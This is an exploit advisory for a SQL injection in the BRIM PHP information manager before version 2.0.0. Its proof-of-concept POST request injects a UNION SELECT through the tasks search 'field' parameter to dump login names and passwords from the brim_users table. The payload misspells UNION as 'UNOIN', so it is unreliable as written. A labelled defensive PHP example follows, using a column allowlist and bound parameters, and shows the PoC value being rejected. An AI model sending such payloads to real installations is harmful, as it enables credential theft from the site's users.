BRIM < 2.0.0 SQL Injection

Information
Title: BRIM < 2.0.0 SQL Injection
Author: ifnull
Tested on: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45, although it can run in any environment. The example uses MySQL 5 query escape but can easily be ported to prior versions of MySQL.
Description: Unlike CVE-2008-4082, this will work with or without magic_quotes_gpc enabled. Like the last exploit, however, you must first create an account and enable "tasks". By default anyone can create an account, and accounts are automatically approved.

Software information
Version: < 2.0.0
URL: http://sourceforge.net/projects/brim/
Description: BRIM is an MVC framework, written in PHP and based on items with a hierarchical relationship. The list of plugins makes BRIM an Information Manager, with plugins like bookmarks, a calendar, contacts, tasks, notes, RSS, etc. The application is multilingual.

Proof of Concept
POST URI: /index.php
Data: plugin=tasks&field=1%3D1%20UNOIN%20SELECT%201%2C2%2C3%2C4%2CCONCAT(loginname%2C0x3a%2Cpassword)%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%20from%20brim_users--&value=asdf&action=searchTasks
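
The payload above travels in the field parameter and contains no quote characters, which is consistent with it working whether or not magic_quotes_gpc is enabled. The following is an added example, not BRIM's code or the author's: a search handler that accepts the column name only from an allowlist and binds the search value. The tasks table, its columns and searchTasks() are hypothetical, and it assumes field is used as a column identifier, which the page does not show.

```php
<?php
// Added example, not BRIM source. Table, column and function names are hypothetical.
const SEARCHABLE_TASK_FIELDS = ['name', 'description', 'status'];

function searchTasks(PDO $db, int $ownerId, string $field, string $value): array
{
    // Identifiers cannot be bound as parameters, so the column name is
    // accepted only when it exactly matches an allowlisted entry.
    if (!in_array($field, SEARCHABLE_TASK_FIELDS, true)) {
        throw new InvalidArgumentException('unsupported search field');
    }
    // $field is now one of three fixed strings; the value is bound.
    $sql = "SELECT id, name, description, status FROM tasks
            WHERE owner_id = :owner AND $field LIKE :value";
    $stmt = $db->prepare($sql);
    $stmt->execute([':owner' => $ownerId, ':value' => '%' . $value . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tasks (id INTEGER PRIMARY KEY, owner_id INTEGER,
           name TEXT, description TEXT, status TEXT)');
$db->exec("INSERT INTO tasks VALUES (1, 7, 'renew cert', 'asdf renewal', 'open')");
$db->exec("INSERT INTO tasks VALUES (2, 8, 'other user', 'asdf private', 'open')");

// A legitimate search returns only the caller's own matching row.
print_r(searchTasks($db, 7, 'description', 'asdf'));

// The field value from the proof of concept, URL-decoded as it appears on the page.
$pocField = '1=1 UNOIN SELECT 1,2,3,4,CONCAT(loginname,0x3a,password),'
          . '6,7,8,9,10,11,12,13,14,15,16,17 from brim_users--';
try {
    searchTasks($db, 7, $pocField, 'asdf');
} catch (InvalidArgumentException $e) {
    // The request is refused before any SQL is built.
    echo 'rejected: ', $e->getMessage(), "\n";
}
```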